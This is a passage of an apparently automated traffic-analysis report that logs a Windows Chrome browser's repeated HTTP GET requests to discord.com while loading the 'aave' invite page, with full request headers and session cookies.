_cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/83715ab23647c1be8510.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/afd372d42c991d346d6b.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js? HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/6932d272acd867e3b6e3.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/e09e89ad935c5efae445.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /assets/b595a2694f43514497d1.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/30e761b4e93a24b607b9.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/2597d11c1e039607373e.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/jsd/r/8ca0e542b81d8c09 HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/a5ec2b74d0cc337d4481.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /api/v9/invites/aave?with_counts=true&with_expiration=true HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjMzMTE0NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=X-Fingerprint: 1289439632471363617.A-2PoLKzD9-wa7EEU6orKB9RamcX-Debug-Options: bugReporterEnabledsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Discord-Timezone: America/New_YorkX-Discord-Locale: en-USsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /assets/0f4597d59327b36932f5.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/be6659ffbe2faab6ce6f.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/1222195a37d6dd10994e.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.560b06bc5c21054b4473.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /assets/83715ab23647c1be8510.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/bfcdec9c24c821355547.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/c1b53be672aac192a996.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.560b06bc5c21054b4473.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /assets/0e5029fd9cd4812b6712.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /assets/b9995525a52dc58aecf5.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /assets/e09e89ad935c5efae445.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/2597d11c1e039607373e.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/ecff74bf4394e6e58dd1.woff2 HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://discord.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://discord.com/assets/69646.560b06bc5c21054b4473.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; 